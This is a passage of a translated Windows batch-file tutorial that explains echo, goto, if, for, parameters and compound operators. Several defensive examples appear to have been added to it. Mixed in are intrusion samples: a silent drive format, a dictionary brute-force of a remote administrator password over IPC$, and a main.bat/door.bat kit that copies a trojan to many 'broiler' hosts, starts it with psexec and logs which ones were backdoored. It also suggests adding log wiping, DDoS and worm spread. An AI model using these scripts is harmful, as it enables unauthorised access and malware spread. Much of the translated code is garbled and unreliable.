I. Overview of simple batch internal commands
1. echo command
Turns command echoing on or off, or displays a message. With no parameters, echo displays the current echo setting.
Syntax:
echo [{on | off}] [message]
Sample: @echo off / echo hello world
In practice we combine this command with the redirection and pipe symbols (commonly >>) to write the output of certain commands in a specific format. This is shown in the later examples.
2. @ command
Indicates that the command following @ is not displayed; during an intrusion (for example, using a batch file to format the other side's hard drive) you naturally do not want them to see the command you are using.
Sample: @echo off
@echo now initializing the program, please wait a minute ...
@format x: /q /u /autoset (the format command does not have a /y parameter; gratifyingly, Microsoft left us an /autoset parameter, which has the same effect as /y.)
3. goto command
Jumps to the specified label. After the label is found, execution continues with the command on the line after it.
Syntax: goto label (label is the parameter specifying the line in the batch program to jump to.)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms (don't worry if you don't understand this yet; it is explained in detail below.)
@rem check parameters; if null, show usage
:noparms
echo usage: monitor.bat ServerIP PortNumber
goto end
The label name can be anything, but it is best to use a meaningful word. Let me add one point: the colon indicates that the word is a label, and the goto command relies on it to find where to jump to next. It is also best to add some explanation so that you will understand your intentions later.
4. rem command
Comment command, equivalent to /* ... */ in C. It is not executed and serves only as a comment, making the file easier to read and modify later.
Syntax: rem message
Sample: @rem here is the description.
5. pause command
When you run the pause command, the following message is displayed:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:\*.* d:\back
echo please put a new disk into drive a
pause
goto begin
In this example, all files on the disk in drive A are copied to d:\back. The displayed note prompts you to put another disk into drive A; the pause command suspends the program so that you can change the disk and press any key to continue processing.
6. call command
Calls another batch program from a batch program without terminating the parent batch program. The call command also accepts a label as the call target. Call has no effect when used from the command line outside a script or batch file.
Syntax:
call [[drive:][path]filename [batchparameters]] [:label [arguments]]
Parameters:
[drive:][path]filename
Specifies the location and name of the batch program to call. The filename parameter must have a .bat or .cmd extension.
7. start command
Calls external programs; all DOS commands and command-line programs can be called with the start command.
Parameters commonly used in intrusions:
MIN        Start the window minimized
SEPARATE   Start a 16-bit Windows program in a separate memory space
HIGH       Start the application in the HIGH priority class
REALTIME   Start the application in the REALTIME priority class
WAIT       Start the application and wait for it to terminate
parameters These are the parameters passed to the command/program
When the executed application is a 32-bit GUI application, cmd.exe does not wait for the application to terminate before returning to the command prompt. This new behavior does not occur when executing within a command script.
8. choice command
Use this command to let the user enter a character in order to run different commands. When using it, add the /c: parameter; after c: write the characters that may be entered, with no spaces. Its return codes are 1, 2, 3, 4 ...
For example: choice /c:dme defrag,mem,end
will display
defrag,mem,end[D,M,E]?
Sample:
The contents of sample.bat are as follows:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (the highest value should be tested first)
if errorlevel 2 goto mem
if errorlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
After this file runs, defrag,mem,end[D,M,E]? is displayed and the user can choose d, m or e. The if statements then make the judgment: d runs the block at label defrag, m runs the block at label mem, and e runs the block at label end. Each block finally jumps to label end with goto end; the program then displays good bye and the file ends.
9. if command
The if command checks whether a specified condition holds, in order to decide which commands to execute. There are three formats:
1. if "parameter"=="string" command
If the parameter equals the specified string, the condition holds and the command runs; otherwise the next line runs. (Note that there are two equals signs.)
Example: if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2. if exist filename command
If the specified file exists, the condition holds and the command runs; otherwise the next line runs.
Example: if exist config.sys edit config.sys
3. if errorlevel / if not errorlevel number command
If the return code is equal to the specified number, the condition holds and the command runs; otherwise the next line runs.
Example: if errorlevel 2 goto x2
A DOS program returns a number to DOS when it finishes, called the error code (errorlevel) or return code; the common return codes are 0 and 1.
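The following script ties the if, goto, rem and errorlevel forms above together into a small defensive check: it looks for failed-logon lines in a log file named on the command line. It is an added example written for this page, not code from the original article; the log file name and the search text "logon failed" are assumptions, and it relies on findstr's documented return codes (0 = match found, 1 = no match, 2 = error), testing the highest value first as the choice section advised.

```batch
@echo off
rem check_log.bat - added example: report whether a log contains failed-logon lines
rem usage: check_log.bat logfile        (logfile is an assumed argument)
if "%~1"=="" goto usage
if not exist "%~1" goto nofile

rem findstr: 0 = at least one match, 1 = no match, 2 = could not read the file.
rem "if errorlevel n" is true for every code >= n, so test the highest value first.
findstr /i /c:"logon failed" "%~1" >nul
if errorlevel 2 goto error
if errorlevel 1 goto clean
echo ALERT: failed logon entries found in %~1
goto end

:clean
echo no failed logon entries in %~1
goto end

:nofile
echo file not found: %~1
goto end

:usage
echo usage: check_log.bat logfile
goto end

:error
echo findstr could not read %~1

:end
```

Run it as check_log.bat security.log; the labels are reached only through goto, and every branch ends at :end so that nothing falls through into the next block.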
10. for command
The for command is a relatively complex command, mainly used to run a command for each item in a specified set.
Syntax: for {%variable | %%variable} in (set) do command [command-parameters]
%variable          Specifies a single-letter replaceable parameter.
(set)              Specifies a set of one or more files. Wildcards may be used.
command            Specifies the command to carry out for each file.
command-parameters Specifies parameters or switches for the specified command.
To use the for command in a batch program, specify %%variable instead of %variable. Variable names are case sensitive, so %i is different from %I.
If command extensions are enabled, the following additional forms of the for command are supported:
for /d %variable in (set) do command [command-parameters]
If set contains wildcards, this matches against directory names instead of file names.
for /r [[drive:]path] %variable in (set) do command [command-parameters]
Walks the directory tree rooted at [drive:]path, executing the for statement in each directory of the tree. If no directory is specified after /r, the current directory is used. If set is just a single period (.) character, it simply enumerates the directory tree.
for /l %variable in (start,step,end) do command [command-parameters]
The set is a sequence of numbers from start to end, in increments of step. So (1,1,5) produces the sequence 1 2 3 4 5 and (5,-1,1) produces the sequence (5 4 3 2 1).
for /f ["options"] %variable in (file-set) do command [command-parameters]
for /f ["options"] %variable in ("string") do command [command-parameters]
for /f ["options"] %variable in ('command') do command [command-parameters]
or, if the usebackq option is present:
for /f ["options"] %variable in ("file-set") do command [command-parameters]
for /f ["options"] %variable in ('string') do command [command-parameters]
for /f ["options"] %variable in (`command`) do command [command-parameters]
filenameset is one or more file names. Each file is opened, read and processed before going on to the next file in filenameset. Processing consists of reading the file, breaking it into individual lines of text and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable set to the token string(s) found. By default, /f passes the first blank-separated token from each line of each file. Blank lines are skipped. You can override the default parsing behaviour with the optional "options" parameter, a quoted string containing one or more keywords that select different parsing options. The keywords are:
eol=c - specifies an end-of-line comment character (just one).
skip=n - specifies the number of lines to skip at the beginning of the file.
delims=xxx - specifies a delimiter set. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n - specifies which tokens from each line are passed to the for body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, specifying the mth through the nth tokens. If the last character of the tokens= string is an asterisk, one more variable is allocated and receives the remaining text on the line after the last token parsed.
usebackq - specifies that the new semantics are in force: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used to quote file names in filenameset.
Sample1:
for /f "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
would parse each line in myfile.txt, ignoring lines that begin with a semicolon and passing the 2nd and 3rd tokens from each line to the for body, with tokens delimited by commas and/or spaces. Notice that the for body references %i to get the 2nd token, %j to get the 3rd token and %k to get all remaining tokens after the 3rd. For file names that contain spaces, you need to enclose the file name in double quotes; to use double quotes in this way you also need the usebackq option, otherwise the double quotes are interpreted as defining a literal string to parse.
%i is explicitly declared in the for statement, while %j and %k are implicitly declared via the tokens= option. You can specify up to 26 tokens via tokens=, provided this does not attempt to declare a variable higher than the letter z or Z. Remember, for variables are single letters, case sensitive and global, and no more than 52 can be active at any one time.
You can also use the for /f parsing logic on an immediate string by making the filenameset between the parentheses a string in single quotes. It is treated as a single line of input from a file and parsed.
Finally, you can use the for /f command to parse the output of a command. You do this by making the filenameset between the parentheses a back-quoted string. It is treated as a command line, passed to a child cmd.exe, and its output is captured into memory and parsed as if it were a file. So the following example:
for /f "usebackq delims==" %i in (`set`) do @echo %i
would enumerate the environment variable names in the current environment.
In addition, substitution of for variable references has been enhanced. You can now use the following optional syntax:
%~I - expands %I removing any surrounding quotes (")
%~fI - expands %I to a fully qualified path name
%~dI - expands %I to a drive letter only
%~pI - expands %I to a path only
%~nI - expands %I to a file name only
%~xI - expands %I to a file extension only
%~sI - expanded path contains short names only
%~aI - expands %I to the file attributes of the file
%~tI - expands %I to the date/time of the file
%~zI - expands %I to the size of the file
%~$PATH:I - searches the directories listed in the PATH environment variable and expands %I to the fully qualified name of the first one found. If the environment variable name is not defined or the file is not found, this modifier expands to the empty string.
The modifiers can be combined to get compound results:
%~dpI - expands %I to a drive letter and path only
%~nxI - expands %I to a file name and extension only
%~fsI - expands %I to a full path name with short names only
%~dp$PATH:I - searches the directories listed in the PATH environment variable for %I and expands to the drive letter and path of the first one found
%~ftzaI - expands %I to a DIR-like output line
In the above examples %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid for variable name. Picking upper-case variable names like %I makes it more readable and avoids confusion with the modifiers, which are not case sensitive. The above is the official help from Microsoft; now let's look at a few examples of using the for command in an intrusion.
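To show the for /f options, the ~ modifiers and the /l form from the help text above doing defensive work, here is an added example written for this page (not code from the original article). It first writes a constructed sample logon log, logons.txt, whose format (date time source-ip user result, with # comment lines) is an assumption, then parses it to count and list failed logons; the rotated log names logons.1 to logons.3 checked by the /l loop are also assumed.

```batch
@echo off
setlocal
rem logon_summary.bat - added example for this page, not from the original article.
rem Step 1: write a constructed sample log (not real events). Each line is:
rem   date time source-ip user result    and lines starting with # are comments.
>logons.txt  echo # constructed sample data, not real events
>>logons.txt echo 2002-05-14 23:51:00 192.168.0.7 alice SUCCESS
>>logons.txt echo 2002-05-14 23:52:10 192.168.0.9 bob FAILURE
>>logons.txt echo 2002-05-14 23:52:11 192.168.0.9 bob FAILURE
>>logons.txt echo 2002-05-14 23:53:42 192.168.0.7 alice SUCCESS

rem Step 2: parse it. eol=# skips the comment line; tokens=3,4,5 puts the ip in %%a,
rem the user in %%b and the result in %%c (implicitly declared, as the help text says).
rem The default delimiters (space and tab) are kept, so no delims= is needed.
set failed=0
set total=0
for /f "eol=# tokens=3,4,5" %%a in (logons.txt) do (
    set /a total+=1
    if /i "%%c"=="FAILURE" (
        set /a failed+=1
        echo failed logon from %%a as %%b
    )
)
echo %failed% of %total% logon events failed

rem Step 3: ~ modifiers on the log file itself: name+extension, size in bytes, date/time.
for %%f in (logons.txt) do echo %%~nxf is %%~zf bytes, last written %%~tf

rem Step 4: for /l numeric loop over assumed rotated log names logons.1 .. logons.3
for /l %%n in (1,1,3) do if exist logons.%%n (echo archive logons.%%n present) else (echo archive logons.%%n missing)
endlocal
```

Because the script runs inside a batch file, every loop variable is written %%a rather than %a, exactly as the note under the for syntax requires; set /a inside the parenthesised block updates the counters without needing delayed expansion, since the totals are only read after the loop has finished.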
Sample2:
Use the for command to achieve the crack of violent password for a target Win2k host.
We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful.
The most important order is a: FOR / F I% in (Dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator"
Use I% to represent the password of Admin, this is connected to the value of the I% in Dict.txt. Then pass the program to run the result to the find command -
FOR / FI %% in (Dict.txt) DO NET USE // IP / IPC $ "I %%" / u: "Administrator" | Find ": command successfully complete" >> D: /ok.txt, so Ko.
Sample3:
Have you ever had a lot of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it.
The main order is only one: (when using the for command in the batch file, specify the variable using %% variable)
@for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do start call door.bat %% i %% J %% K
For use, please refer to Sample1 above, where it represents the parameter% I% J% K in door.bat in order.
CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file.
Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.
Code prototype:
--------------- Cut Here Then Save As a Batchfile (I Call it main.bat) ---------------------------
@echo off
@IF "% 1" == "" GOTO USAGE
@for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) do start call ipchack.bat %% i %% J %% K
@goto end
: USAGE
@echo run this bath in dos mode.or Just Double-Click IT.
: END: END
--------------- Cut Here Then Save As a Batchfile (I Call it main.bat) ---------------------------
--------------- Cut Here Then Save as a batchfile (i call it door.bat) ---------------------------
@NET USE / /% 1 / IPC $% 3 / U: "% 2"
@if Errorlevel 1 Goto Failed
@echo trying to establish the ipc $ connection ............ ok
@copy windrv32.exe //% 1 / admin $ / system32 && if not errorlevel 1 echo ip% 1 user% 2 PWD% 3 >> KO.TXT
@PSexec //% 1 C: /Winnt/System32/Windrv32.exe
@PSEXEC / /% 1 NET Start Windrv32 && if Not Errorlevel 1 Echo% 1 Backdooored >> Ko.txt
: Failed
@echo sorry can not connect to the VICTIM.
----------------- Cut Here Then Save as a batchfile (i call it door.bat) ----------------------
This is just a prototype. The two batch files, the trojan program (Windrv32.exe) and psexec.exe need to be placed in the same directory. The batch content can be extended further, for example by adding the ability to clear logs or launch DDoS, adding a user on a timer, or, going deeper, making it propagate automatically (a worm). I won't go into more detail; interested friends can study it themselves.
II. How to use parameters in batch files
Parameters can be used in batch files, usually %1 to %9. When there are more than nine parameters you need to use shift to move along; this situation is not very common, so we won't consider it here.
Sample1: fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a: /q /u /autoset
@echo please insert another disk into drive a.
@pause
@goto format
This example is used to format several floppy disks in succession, so when you use it you need to type fomat.bat a in the DOS window. Hmm, it seems a bit like drawing a snake and adding feet ~ ^_^
Sample2:
When we want to set up an IPC$ connection, we always have to type a long command, and it is easy to get it wrong. So we'd better write the fixed part of the command into a batch file and pass the broiler's IP, password and user name to it as parameters; that way you don't have to type the whole command every time.
@echo off
@NET USE / / 1% / IPC $ "2%" / u: "3%" Note Oh, this PASSWORD is the second parameter.
@if errorlevel 1 echo connection failed
How about it, isn't it simpler with parameters? You must learn this ^_^.
III. How to use compound commands
1. &
Usage: first command & second command [& third command ...]
This runs several commands in sequence, regardless of whether each command succeeds.
Sample:
C:\>dir z: & dir c:\ex4rch
The system cannot find the path specified.
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of c:\ex4rch
2002-05-14  23:51    <DIR>          .
2002-05-14  23:51    <DIR>          ..
2002-05-14  23:51                14 sometips.gif
2. &&
Usage: first command && second command [&& third command ...]
This also runs several commands in sequence, but when a command fails the commands after it are not executed; if no error occurs, all the commands are executed.
Sample:
C:\>dir z: && dir c:\ex4rch
The system cannot find the path specified.
C:\>dir c:\ex4rch && dir z:
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of c:\ex4rch
2002-05-14  23:55    <DIR>          .
2002-05-14  23:55    <DIR>          ..
2002-05-14  23:55                14 sometips.gif
               1 File(s)             14 bytes
               2 Dir(s)     768,671,744 bytes free
The system cannot find the path specified.
This is quite handy when making backups, for example:
dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb e:\backup
If backup.mdb exists on the remote server, the copy command is executed; if it does not exist, the copy command is not executed. This usage can replace if exist :)
3. ||
Usage: first command || second command [|| third command ...]
This also runs several commands in sequence, but when a command succeeds the commands after it are not executed; if none of the commands succeeds, all of them are executed.
Sample:
C:\ex4rch>dir sometips.gif || del sometips.gif
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of c:\ex4rch
2002-05-14  23:55                14 sometips.gif
               1 File(s)             14 bytes
               0 Dir(s)     768,696,320 bytes free
Examples of combined commands:
SAMPLE:
@Copy Trojan.exe //% 1 / Admin $ / SYSTEM32 && IF NOT Errorlevel 1 Echo IP% 1 User% 2 Pass% 3 >> Victim.txt
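As a further illustration of the three operators, here is an added example written for this page (not code from the original article) that uses &, && and || for the backup scenario mentioned under && above: it archives a log file and reports failure instead of silently continuing. The paths c:\logs\app.log and d:\archive are assumptions.

```batch
@echo off
rem archive_log.bat - added example for this page, not from the original article.
rem Assumed paths: c:\logs\app.log is the log to preserve, d:\archive the destination.
set src=c:\logs\app.log
set dst=d:\archive

rem &  : both commands run whatever happens (mkdir fails harmlessly if the folder exists)
mkdir "%dst%" 2>nul & echo archive folder ready

rem && : each step runs only if the previous one succeeded
rem || : the final message runs only if the step before it failed
dir "%src%" >nul && copy /y "%src%" "%dst%\" >nul && echo copied %src% || echo ERROR: could not archive %src%

rem verify the copy byte for byte before trusting the archive (fc /b returns 0 for identical files)
fc /b "%src%" "%dst%\app.log" >nul && echo archive verified || echo ERROR: archive differs from source
```

The chain a && b || c reads as "if a succeeds run b, and if whichever command ran last failed run c", so a single line both performs the step and reports its outcome; the fc check at the end is the part an attacker's script leaves out and a defender's script should not.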